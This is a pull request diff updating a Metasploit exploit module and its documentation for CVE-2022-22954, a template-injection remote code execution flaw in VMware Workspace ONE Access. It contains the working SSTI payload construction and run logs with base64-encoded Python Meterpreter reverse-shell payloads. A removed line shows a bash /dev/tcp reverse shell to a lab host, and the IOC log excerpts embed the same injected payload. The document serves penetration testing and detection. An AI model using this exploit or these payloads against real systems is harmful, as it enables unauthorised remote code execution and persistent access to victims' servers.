### PR TITLE
Fix VMware Workspace ONE Access CVE-2022-22954

### DIFF
--- a/documentation/modules/exploit/linux/http/vmware_workspace_one_access_cve_2022_22954.md
+++ b/documentation/modules/exploit/linux/http/vmware_workspace_one_access_cve_2022_22954.md
@@ -38,7 +38,6 @@ Module options (exploit/linux/http/vmware_workspace_one_access_cve_2022_22954):
    SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
    TARGETURI  /                yes       Base path
    URIPATH                     no        The URI to use for this exploit (default is random)
-   VHOST                       no        HTTP server virtual host
 
 
 Payload options (cmd/unix/python/meterpreter/reverse_tcp):
@@ -68,12 +67,12 @@ msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > run
 
 [*] Started reverse TCP handler on 127.0.0.1:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
-[*] Executing command: bash -c {eval,$({echo,ZWNobyBROVVCc3g1dWNUM2E2}|{base64,-d})}
+[*] Executing command: bash -c {eval,$({echo,ZWNobyBWR3h3NHNpeFMyeElx}|{base64,-d})}
 [+] The target is vulnerable.
 [*] Executing cmd/unix/python/meterpreter/reverse_tcp (Unix Command)
 [*] Executing command: bash -c {eval,$({echo,ZWNobyBleGVjXChfX2ltcG9ydF9fXChcJ2Jhc2U2NFwnXCkuYjY0ZGVjb2RlXChfX2ltcG9ydF9fXChcJ2NvZGVjc1wnXCkuZ2V0ZW5jb2RlclwoXCd1dGYtOFwnXClcKFwnYVcxd2IzSjBJSE52WTJ0bGRDeDZiR2xpTEdKaGMyVTJOQ3h6ZEhKMVkzUXNkR2x0WlFwbWIzSWdlQ0JwYmlCeVlXNW5aU2d4TUNrNkNnbDBjbms2Q2drSmN6MXpiMk5yWlhRdWMyOWphMlYwS0RJc2MyOWphMlYwTGxOUFEwdGZVMVJTUlVGTktRb0pDWE11WTI5dWJtVmpkQ2dvSnpFNU1pNHhOamd1TUM0MEp5dzBORFEwS1NrS0NRbGljbVZoYXdvSlpYaGpaWEIwT2dvSkNYUnBiV1V1YzJ4bFpYQW9OU2tLYkQxemRISjFZM1F1ZFc1d1lXTnJLQ2MrU1Njc2N5NXlaV04yS0RRcEtWc3dYUXBrUFhNdWNtVmpkaWhzS1FwM2FHbHNaU0JzWlc0b1pDazhiRG9LQ1dRclBYTXVjbVZqZGloc0xXeGxiaWhrS1NrS1pYaGxZeWg2YkdsaUxtUmxZMjl0Y0hKbGMzTW9ZbUZ6WlRZMExtSTJOR1JsWTI5a1pTaGtLU2tzZXlkekp6cHpmU2tLXCdcKVxbMFxdXClcKSB8IGV4ZWMgJCh3aGljaCBweXRob24gfHwgd2hpY2ggcHl0aG9uMyB8fCB3aGljaCBweXRob24yKSAt}|{base64,-d})}
 [*] Sending stage (40060 bytes) to 127.0.0.1
-[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:58912) at 2022-05-03 10:36:09 -0500
+[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:59441) at 2022-05-03 11:50:00 -0500
 
 meterpreter > getuid
 Server username: horizon
@@ -92,6 +91,6 @@ meterpreter >
 
 ```
 [snip]
-2022-05-03 15:36:07,617 WARN (Thread-278) [com.vmware.endusercatalog.ui.web.UiApplicationExceptionResolver.resolveException] <GreenBox> <correlation_id: 0ba611fb-897a-42e9-be7f-60d6d7e9aaba> <tenant_id: t3cgkcmrd> <client_ip: 192.168.0.2> <username: > <device_id: > - Additional error info for requestId 0ba611fb-897a-42e9-be7f-60d6d7e9aaba which resulted in return code 400, mapped to error code auth.context.invalid and, error is: {"code":"auth.context.invalid","message":"Authorization context is not valid. Login request  received with tenant code: t3cgkcmrd, device id: null, device type: ${\"freemarker.template.utility.Execute\"?new()(\"bash -c {eval,$({echo,ZWNobyBleGVjXChfX2ltcG9ydF9fXChcJ2Jhc2U2NFwnXCkuYjY0ZGVjb2RlXChfX2ltcG9ydF9fXChcJ2NvZGVjc1wnXCkuZ2V0ZW5jb2RlclwoXCd1dGYtOFwnXClcKFwnYVcxd2IzSjBJSE52WTJ0bGRDeDZiR2xpTEdKaGMyVTJOQ3h6ZEhKMVkzUXNkR2x0WlFwbWIzSWdlQ0JwYmlCeVlXNW5aU2d4TUNrNkNnbDBjbms2Q2drSmN6MXpiMk5yWlhRdWMyOWphMlYwS0RJc2MyOWphMlYwTGxOUFEwdGZVMVJTUlVGTktRb0pDWE11WTI5dWJtVmpkQ2dvSnpFNU1pNHhOamd1TUM0MEp5dzBORFEwS1NrS0NRbGljbVZoYXdvSlpYaGpaWEIwT2dvSkNYUnBiV1V1YzJ4bFpYQW9OU2tLYkQxemRISjFZM1F1ZFc1d1lXTnJLQ2MrU1Njc2N5NXlaV04yS0RRcEtWc3dYUXBrUFhNdWNtVmpkaWhzS1FwM2FHbHNaU0JzWlc0b1pDazhiRG9LQ1dRclBYTXVjbVZqZGloc0xXeGxiaWhrS1NrS1pYaGxZeWg2YkdsaUxtUmxZMjl0Y0hKbGMzTW9ZbUZ6WlRZMExtSTJOR1JsWTI5a1pTaGtLU2tzZXlkekp6cHpmU2tLXCdcKVxbMFxdXClcKSB8IGV4ZWMgJCh3aGljaCBweXRob24gfHwgd2hpY2ggcHl0aG9uMyB8fCB3aGljaCBweXRob24yKSAt}|{base64,-d})}\")} and token revoke status: false."}, mapped exception class :class com.vmware.endusercatalog.auth.InvalidAuthContextException
+2022-05-03 16:49:58,796 WARN (Thread-289) [com.vmware.endusercatalog.ui.web.UiApplicationExceptionResolver.resolveException] <GreenBox> <correlation_id: e7eb8ce2-9bba-4526-8720-208d93e8913b> <tenant_id: 6g79dnjuixnnsar> <client_ip: 192.168.0.2> <username: > <device_id: > - Additional error info for requestId e7eb8ce2-9bba-4526-8720-208d93e8913b which resulted in return code 400, mapped to error code auth.context.invalid and, error is: {"code":"auth.context.invalid","message":"Authorization context is not valid. Login request  received with tenant code: 6g79dnjuixnnsar, device id: null, device type: ${\"freemarker.template.utility.Execute\"?new()(\"bash -c {eval,$({echo,ZWNobyBleGVjXChfX2ltcG9ydF9fXChcJ2Jhc2U2NFwnXCkuYjY0ZGVjb2RlXChfX2ltcG9ydF9fXChcJ2NvZGVjc1wnXCkuZ2V0ZW5jb2RlclwoXCd1dGYtOFwnXClcKFwnYVcxd2IzSjBJSE52WTJ0bGRDeDZiR2xpTEdKaGMyVTJOQ3h6ZEhKMVkzUXNkR2x0WlFwbWIzSWdlQ0JwYmlCeVlXNW5aU2d4TUNrNkNnbDBjbms2Q2drSmN6MXpiMk5yWlhRdWMyOWphMlYwS0RJc2MyOWphMlYwTGxOUFEwdGZVMVJTUlVGTktRb0pDWE11WTI5dWJtVmpkQ2dvSnpFNU1pNHhOamd1TUM0MEp5dzBORFEwS1NrS0NRbGljbVZoYXdvSlpYaGpaWEIwT2dvSkNYUnBiV1V1YzJ4bFpYQW9OU2tLYkQxemRISjFZM1F1ZFc1d1lXTnJLQ2MrU1Njc2N5NXlaV04yS0RRcEtWc3dYUXBrUFhNdWNtVmpkaWhzS1FwM2FHbHNaU0JzWlc0b1pDazhiRG9LQ1dRclBYTXVjbVZqZGloc0xXeGxiaWhrS1NrS1pYaGxZeWg2YkdsaUxtUmxZMjl0Y0hKbGMzTW9ZbUZ6WlRZMExtSTJOR1JsWTI5a1pTaGtLU2tzZXlkekp6cHpmU2tLXCdcKVxbMFxdXClcKSB8IGV4ZWMgJCh3aGljaCBweXRob24gfHwgd2hpY2ggcHl0aG9uMyB8fCB3aGljaCBweXRob24yKSAt}|{base64,-d})}\")} and token revoke status: false."}, mapped exception class :class com.vmware.endusercatalog.auth.InvalidAuthContextException
 [snip]
 ```

--- a/documentation/modules/exploit/linux/http/vmware_workspace_one_access_cve_2022_22954.md
+++ b/documentation/modules/exploit/linux/http/vmware_workspace_one_access_cve_2022_22954.md
@@ -22,7 +22,7 @@ Follow [Setup](#setup) and [Scenarios](#scenarios).
 
 ```
 msf6 > use exploit/linux/http/vmware_workspace_one_access_cve_2022_22954
-[*] Using configured payload cmd/unix/reverse_bash
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
 msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > options
 
 Module options (exploit/linux/http/vmware_workspace_one_access_cve_2022_22954):
@@ -41,7 +41,7 @@ Module options (exploit/linux/http/vmware_workspace_one_access_cve_2022_22954):
    VHOST                       no        HTTP server virtual host
 
 
-Payload options (cmd/unix/reverse_bash):
+Payload options (cmd/unix/python/meterpreter/reverse_tcp):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
@@ -66,19 +66,24 @@ msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > set verbos
 verbose => true
 msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > run
 
-[+] bash -c '0<&159-;exec 159<>/dev/tcp/192.168.0.4/4444;sh <&159 >&159 2>&159'
 [*] Started reverse TCP handler on 127.0.0.1:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
-[*] Executing command: bash -c {eval,$({echo,ZWNobyAzUjNQazhpemd6}|{base64,-d})}
+[*] Executing command: bash -c {eval,$({echo,ZWNobyBROVVCc3g1dWNUM2E2}|{base64,-d})}
 [+] The target is vulnerable.
-[*] Executing cmd/unix/reverse_bash (Unix Command)
-[*] Executing command: bash -c {eval,$({echo,YmFzaCAtYyAnMDwmMTAxLTtleGVjIDEwMTw+L2Rldi90Y3AvMTkyLjE2OC4wLjQvNDQ0NDtzaCA8JjEwMSA+JjEwMSAyPiYxMDEn}|{base64,-d})}
-[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:57862) at 2022-05-03 02:33:24 -0500
+[*] Executing cmd/unix/python/meterpreter/reverse_tcp (Unix Command)
+[*] Executing command: bash -c {eval,$({echo,ZWNobyBleGVjXChfX2ltcG9ydF9fXChcJ2Jhc2U2NFwnXCkuYjY0ZGVjb2RlXChfX2ltcG9ydF9fXChcJ2NvZGVjc1wnXCkuZ2V0ZW5jb2RlclwoXCd1dGYtOFwnXClcKFwnYVcxd2IzSjBJSE52WTJ0bGRDeDZiR2xpTEdKaGMyVTJOQ3h6ZEhKMVkzUXNkR2x0WlFwbWIzSWdlQ0JwYmlCeVlXNW5aU2d4TUNrNkNnbDBjbms2Q2drSmN6MXpiMk5yWlhRdWMyOWphMlYwS0RJc2MyOWphMlYwTGxOUFEwdGZVMVJTUlVGTktRb0pDWE11WTI5dWJtVmpkQ2dvSnpFNU1pNHhOamd1TUM0MEp5dzBORFEwS1NrS0NRbGljbVZoYXdvSlpYaGpaWEIwT2dvSkNYUnBiV1V1YzJ4bFpYQW9OU2tLYkQxemRISjFZM1F1ZFc1d1lXTnJLQ2MrU1Njc2N5NXlaV04yS0RRcEtWc3dYUXBrUFhNdWNtVmpkaWhzS1FwM2FHbHNaU0JzWlc0b1pDazhiRG9LQ1dRclBYTXVjbVZqZGloc0xXeGxiaWhrS1NrS1pYaGxZeWg2YkdsaUxtUmxZMjl0Y0hKbGMzTW9ZbUZ6WlRZMExtSTJOR1JsWTI5a1pTaGtLU2tzZXlkekp6cHpmU2tLXCdcKVxbMFxdXClcKSB8IGV4ZWMgJCh3aGljaCBweXRob24gfHwgd2hpY2ggcHl0aG9uMyB8fCB3aGljaCBweXRob24yKSAt}|{base64,-d})}
+[*] Sending stage (40060 bytes) to 127.0.0.1
+[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:58912) at 2022-05-03 10:36:09 -0500
 
-id
-uid=1001(horizon) gid=1003(www) groups=1003(www),1001(vfabric),1002(pivotal)
-uname -a
-Linux photon-machine 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021 x86_64 GNU/Linux
+meterpreter > getuid
+Server username: horizon
+meterpreter > sysinfo
+Computer        : photon-machine
+OS              : Linux 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter >
 ```
 
 ## IOCs
@@ -87,6 +92,6 @@ Linux photon-machine 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021 x8
 
 ```
 [snip]
-2022-05-03 07:33:17,988 WARN (Thread-147) [com.vmware.endusercatalog.ui.web.UiApplicationExceptionResolver.resolveException] <GreenBox> <correlation_id: fe10fc5e-ff7d-4a5a-96bf-f2e1b20eb63f> <tenant_id: zt1myh6phvlz> <client_ip: 192.168.0.2> <username: > <device_id: > - Additional error info for requestId fe10fc5e-ff7d-4a5a-96bf-f2e1b20eb63f which resulted in return code 400, mapped to error code auth.context.invalid and, error is: {"code":"auth.context.invalid","message":"Authorization context is not valid. Login request  received with tenant code: zt1myh6phvlz, device id: null, device type: ${\"freemarker.template.utility.Execute\"?new()(\"bash -c {eval,$({echo,YmFzaCAtYyAnMDwmMTAxLTtleGVjIDEwMTw+L2Rldi90Y3AvMTkyLjE2OC4wLjQvNDQ0NDtzaCA8JjEwMSA+JjEwMSAyPiYxMDEn}|{base64,-d})}\")} and token revoke status: false."}, mapped exception class :class com.vmware.endusercatalog.auth.InvalidAuthContextException
+2022-05-03 15:36:07,617 WARN (Thread-278) [com.vmware.endusercatalog.ui.web.UiApplicationExceptionResolver.resolveException] <GreenBox> <correlation_id: 0ba611fb-897a-42e9-be7f-60d6d7e9aaba> <tenant_id: t3cgkcmrd> <client_ip: 192.168.0.2> <username: > <device_id: > - Additional error info for requestId 0ba611fb-897a-42e9-be7f-60d6d7e9aaba which resulted in return code 400, mapped to error code auth.context.invalid and, error is: {"code":"auth.context.invalid","message":"Authorization context is not valid. Login request  received with tenant code: t3cgkcmrd, device id: null, device type: ${\"freemarker.template.utility.Execute\"?new()(\"bash -c {eval,$({echo,ZWNobyBleGVjXChfX2ltcG9ydF9fXChcJ2Jhc2U2NFwnXCkuYjY0ZGVjb2RlXChfX2ltcG9ydF9fXChcJ2NvZGVjc1wnXCkuZ2V0ZW5jb2RlclwoXCd1dGYtOFwnXClcKFwnYVcxd2IzSjBJSE52WTJ0bGRDeDZiR2xpTEdKaGMyVTJOQ3h6ZEhKMVkzUXNkR2x0WlFwbWIzSWdlQ0JwYmlCeVlXNW5aU2d4TUNrNkNnbDBjbms2Q2drSmN6MXpiMk5yWlhRdWMyOWphMlYwS0RJc2MyOWphMlYwTGxOUFEwdGZVMVJTUlVGTktRb0pDWE11WTI5dWJtVmpkQ2dvSnpFNU1pNHhOamd1TUM0MEp5dzBORFEwS1NrS0NRbGljbVZoYXdvSlpYaGpaWEIwT2dvSkNYUnBiV1V1YzJ4bFpYQW9OU2tLYkQxemRISjFZM1F1ZFc1d1lXTnJLQ2MrU1Njc2N5NXlaV04yS0RRcEtWc3dYUXBrUFhNdWNtVmpkaWhzS1FwM2FHbHNaU0JzWlc0b1pDazhiRG9LQ1dRclBYTXVjbVZqZGloc0xXeGxiaWhrS1NrS1pYaGxZeWg2YkdsaUxtUmxZMjl0Y0hKbGMzTW9ZbUZ6WlRZMExtSTJOR1JsWTI5a1pTaGtLU2tzZXlkekp6cHpmU2tLXCdcKVxbMFxdXClcKSB8IGV4ZWMgJCh3aGljaCBweXRob24gfHwgd2hpY2ggcHl0aG9uMyB8fCB3aGljaCBweXRob24yKSAt}|{base64,-d})}\")} and token revoke status: false."}, mapped exception class :class com.vmware.endusercatalog.auth.InvalidAuthContextException
 [snip]
 ```

--- a/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb
+++ b/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb
@@ -83,6 +83,8 @@ class MetasploitModule < Msf::Exploit::Remote
     register_advanced_options([
       OptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5])
     ])
+
+    deregister_options('VHOST')
   end
 
   def check

--- a/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb
+++ b/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Arch' => ARCH_CMD,
               'Type' => :cmd,
               'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/reverse_bash'
+                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
               }
             }
           ],
@@ -79,6 +79,10 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options([
       OptString.new('TARGETURI', [true, 'Base path', '/'])
     ])
+
+    register_advanced_options([
+      OptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5])
+    ])
   end
 
   def check
@@ -102,6 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, _opts = {})
+    # Pass cmd to bash without word splitting
     bash_cmd = "bash -c {eval,$({echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d})}"
 
     vprint_status("Executing command: #{bash_cmd}")
@@ -115,7 +120,7 @@ class MetasploitModule < Msf::Exploit::Remote
         # https://freemarker.apache.org/docs/api/freemarker/template/utility/Execute.html
         ssti_param => %(${"freemarker.template.utility.Execute"?new()("#{bash_cmd}")})
       }
-    }, 3.5)
+    }, datastore['CmdExecTimeout'])
 
     return unless res
     return '' unless res.code == 400 && res.body.include?('auth.context.invalid')


### PR DESCRIPTION
Fixes #16512, though superficially:

1. Adds `CmdExecTimeout`
1. Uses `cmd/unix/python/meterpreter/reverse_tcp` from #16186
1. Deregisters `VHOST`

cc @smcintyre-r7